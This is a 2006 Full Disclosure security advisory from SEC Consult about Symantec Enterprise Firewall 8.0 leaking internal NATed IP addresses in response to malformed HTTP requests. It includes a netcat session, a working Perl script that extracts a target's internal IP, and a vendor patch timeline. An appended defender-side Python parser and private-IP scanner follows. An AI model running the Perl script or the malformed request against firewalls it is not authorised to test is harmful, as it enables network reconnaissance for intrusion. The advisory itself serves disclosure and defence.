SEC Consult SA-20060512-0 :: Symantec Enterprise Firewall NAT/HTTP
Date: Fri, 12 May 2006 09:35:42 +0200
From: Bernhard Mueller <research@sec-consult.com>
To: Full Disclosure <full-disclosure@lists.grok.org.uk>
Subject: SEC Consult SA-20060512-0 :: Symantec Enterprise Firewall NAT/HTTP Proxy Private IP Exposure

SEC Consult Security Advisory 20060512-0

title:              Symantec Enterprise Firewall NAT/HTTP Proxy Private IP Exposure
program:            Symantec Enterprise FW
vulnerable version: 8.0
homepage:           www.symantec.com
found:              2005-09-13
by:                 SEC Consult / www.sec-consult.com

Vendor description:
---------------
Symantec's Enterprise Firewall provides complete network protection by integrating smart application-level proxies, network circuits and packet filtering into a special perimeter-security architecture (...)

Vulnerability overview:
---------------
Enterprise FW leaks the internal IP addresses of NATed machines in response to certain HTTP requests.

Vulnerability details:
---------------
A request of the form "get/XX HTTP/1.0" (note the missing space between the method and the path) triggers the exposure. The firewall appears to forward the request and wait a certain time for a reply from the web server, until the timeout is reached. The final response from the firewall looks like this:

df0rm@b4byl0n:~> netcat www.behind-raptor.com 80
get/01 http/1.0

HTTP/1.1 504 Gateway Timeout
MIME-Version: 1.0
Server: Simple, Secure Web Server 1.1
Date: Tue, 13 Sep 2005 06:23:32 GMT
Connection: close
Content-Type: text/html
[...]
The request seen by the firewall was:
<tt><ul><li> http://10.238.94.57/01

Here's a simple script to map external to internal IPs.
---------------
#!/usr/bin/perl
# [title]  raptor firewall internal IP disclosure 'exploit'
# [mailto] research [at] sec-consult [dot] com
#
# sk0L@b4byl0n:~/home/sk0L> perl raptor-nat.pl behind.raptor.com
# waiting for timeout (this can take about 1 min.)
# behind.raptor.com: 10.238.94.67

use strict;
use warnings;
use IO::Socket;

$| = 1;    # unbuffered output, so the "waiting" line shows up immediately

my $host = $ARGV[0] or die "$0 <host>\n";

# malformed request line (no space between method and path); the XXX marker
# is what the regex below looks for in the firewall's error page
my $request = "getXXX/XXX HTTP/1.0\n\n";

my $sock = IO::Socket::INET->new(
    PeerAddr => $host,
    PeerPort => 80,
    Proto    => 'tcp',
);
die "could not open socket: $!\n" unless $sock;

print $sock $request;
print "waiting for timeout (this can take about 1 min.)\n";

# the 504 page echoes the request as seen by the firewall, i.e. with the
# internal (NATed) address in place of the external one
my $ip;
while (<$sock>) {
    if ($_ =~ /http:\/\/(\d+\.\d+\.\d+\.\d+)XXX/) {
        $ip = $1;
    }
}

if (defined($ip)) {
    print "$host: $ip\n";
} else {
    print "failed.\n";
}
close($sock);

vendor status:
---------------
vendor notified:  2005-09-13
vendor response:  2005-09-13
patch available:  2005-12

General remarks
---------------
We would like to apologize in advance for potential nonconformities and/or known issues.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH
Office Vienna
Blindengasse 3
A-1080 Wien
Austria

Tel.: +43 / 1 / 409 0307 - 570
Fax.: +43 / 1 / 409 0307 - 590
Mail: office at sec-consult dot com
www.sec-consult.com

EOF SEC Consult / @2006
research at sec-consult dot com
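The following is an added example written from the defender's side; it is not part of the advisory or of the SEC Consult script. It shows the two checks the issue above calls for: a strict request-line parser of the kind a proxy should apply before forwarding anything (it rejects "get/01 http/1.0" and "getXXX/XXX HTTP/1.0" because "/" is not a token character), and a scanner that flags RFC 1918 addresses in a gateway's own error pages, run over a constructed copy of the 504 body quoted in the advisory.

```python
import ipaddress
import re

# RFC 2616 "token" characters: CHAR minus CTLs and separators. "/" is a
# separator, so "get/01" and "getXXX/XXX" are not valid method tokens.
_TOKEN_RE = re.compile(r"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")
_VERSION_RE = re.compile(r"^HTTP/\d+\.\d+$")
_IPV4_RE = re.compile(r"(?<!\d)(\d{1,3}(?:\.\d{1,3}){3})(?!\d)")
_RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

def parse_request_line(line):
    """Strict 'METHOD SP request-target SP HTTP-version' parse; ValueError otherwise.
    A proxy applying this would answer 'get/01 http/1.0' with 400 Bad Request
    instead of forwarding it and later echoing the rewritten internal URL."""
    parts = line.rstrip("\r\n").split(" ")
    if len(parts) != 3:
        raise ValueError("expected exactly three space-separated fields")
    method, target, version = parts
    if not _TOKEN_RE.match(method):
        raise ValueError("method is not an RFC 2616 token: %r" % method)
    if not (target == "*" or target.startswith("/") or "://" in target):
        raise ValueError("bad request-target: %r" % target)
    if not _VERSION_RE.match(version):
        raise ValueError("bad HTTP-version: %r" % version)
    return method, target, version

def is_wellformed(line):
    try:
        parse_request_line(line)
        return True
    except ValueError:
        return False

def find_private_ips(body):
    """RFC 1918 addresses embedded in a response body, in order, without duplicates."""
    found = []
    for m in _IPV4_RE.finditer(body):
        try:
            ip = ipaddress.ip_address(m.group(1))
        except ValueError:        # e.g. an octet above 255
            continue
        if any(ip in net for net in _RFC1918) and str(ip) not in found:
            found.append(str(ip))
    return found

# Constructed copy of the 504 page quoted in the advisory (not captured traffic).
SAMPLE_504_BODY = ("HTTP/1.1 504 Gateway Timeout\r\nServer: Simple, Secure Web Server 1.1\r\n"
                   "Content-Type: text/html\r\n\r\nThe request seen by the firewall was:\n"
                   "<tt><ul><li> http://10.238.94.57/01\n")
```

Pointing find_private_ips at the error pages your own gateway returns for deliberately malformed requests is a quick regression check that the fixed build no longer echoes internal addresses.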
